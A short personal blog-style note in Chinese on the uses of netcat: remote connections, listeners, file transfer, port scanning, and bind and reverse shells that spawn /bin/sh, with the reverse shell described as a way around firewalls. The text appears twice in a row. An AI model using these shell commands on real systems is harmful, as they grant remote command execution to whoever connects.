以前做一些網路除錯或是測試是否有連通都是用telnet或是nmap
這兩天參加教育訓練剛好看到影片中有使用nc這個指令(全名是netcat)
後來就去查了一下,挖靠不得了,這工具真是包山包海
可以開socket server,也可以直接對遠端做連線
可以掃port,甚至可以拿來操控對方電腦、傳檔案
真是方便到一個不行
對遠端做連線
nc x.x.x.x port
開啟socket server等待連線
nc -l port
傳送檔案
[接收端]
nc -l 9999 > 寫入的檔案名稱
[傳送端]
nc x.x.x.x 9999 < 要傳送的檔案名稱
port掃描
nc -vv -z -w1 x.x.x.x port1~port2 #w1是指一秒
不過掃描port的功能比起nmap其實還差蠻遠的
遙控電腦
[被遙控端]
如果被遙控端的電腦是linux,執行命令是/bin/sh
如果是windows,則是cmd.exe
nc -v -l -p port -e /bin/sh
當然一般正常會希望這個process一直存在著,所以可以加上-k
這樣就不會斷線之後這個process就結束了
[控制端]
nc x.x.x.x port
遙控電腦(反向控制)
所謂反向控制遙控是指連線由被控制端主動發起
避免port被防火牆擋住(A要控制B,B去向A請求、建立連線後,A遙控B做動作)
[控制端]
nc -l -vv -p port
[被遙控端]
nc -e /bin/sh x.x.x.x port
另外她還有一些,偽造source ip 的功能我就沒有特別研究了
這兩天參加教育訓練剛好看到影片中有使用nc這個指令(全名是netcat)
後來就去查了一下,挖靠不得了,這工具真是包山包海
可以開socket server,也可以直接對遠端做連線
可以掃port,甚至可以拿來操控對方電腦、傳檔案
真是方便到一個不行
對遠端做連線
nc x.x.x.x port
開啟socket server等待連線
nc -l port
傳送檔案
[接收端]
nc -l 9999 > 寫入的檔案名稱
[傳送端]
nc x.x.x.x 9999 < 要傳送的檔案名稱
port掃描
nc -vv -z -w1 x.x.x.x port1~port2 #w1是指一秒
不過掃描port的功能比起nmap其實還差蠻遠的
遙控電腦
[被遙控端]
如果被遙控端的電腦是linux,執行命令是/bin/sh
如果是windows,則是cmd.exe
nc -v -l -p port -e /bin/sh
當然一般正常會希望這個process一直存在著,所以可以加上-k
這樣就不會斷線之後這個process就結束了
[控制端]
nc x.x.x.x port
遙控電腦(反向控制)
所謂反向控制遙控是指連線由被控制端主動發起
避免port被防火牆擋住(A要控制B,B去向A請求、建立連線後,A遙控B做動作)
[控制端]
nc -l -vv -p port
[被遙控端]
nc -e /bin/sh x.x.x.x port
另外她還有一些,偽造source ip 的功能我就沒有特別研究了